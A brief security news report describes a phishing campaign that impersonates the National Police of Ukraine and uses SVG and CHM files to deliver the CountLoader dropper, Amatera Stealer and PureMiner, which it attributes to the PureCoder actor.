A new phishing campaign is targeting Ukrainian government agencies by impersonating official entities to deliver a sophisticated chain of malware. The attack begins with phishing emails that appear to be notices from the National Police of Ukraine. The emails contain malicious Scalable Vector Graphics (SVG) files, which serve as the initial trigger for the infection chain.
When opened, the SVG files download a password-protected ZIP archive containing a Compiled HTML Help (CHM) file. Once launched, the CHM file sets off a sequence of events that results in the installation of CountLoader, a malware loader that acts as a dropper for additional threats. In this instance, CountLoader is used to deploy Amatera Stealer and PureMiner.
Amatera Stealer, a variant of ACRStealer, is designed to harvest sensitive information from infected systems, including data from browsers, cryptocurrency wallets, and applications like Steam and Telegram. PureMiner, on the other hand, is a stealthy .NET-based cryptocurrency miner. Both threats are executed without leaving files on disk, using techniques like .NET Ahead-of-Time (AOT) compilation and memory injection to evade detection.
The both tools are part of a larger malware suite developed by a threat actor known as PureCoder, whose other creations include remote access trojans, crypters, clippers, and botnet loaders.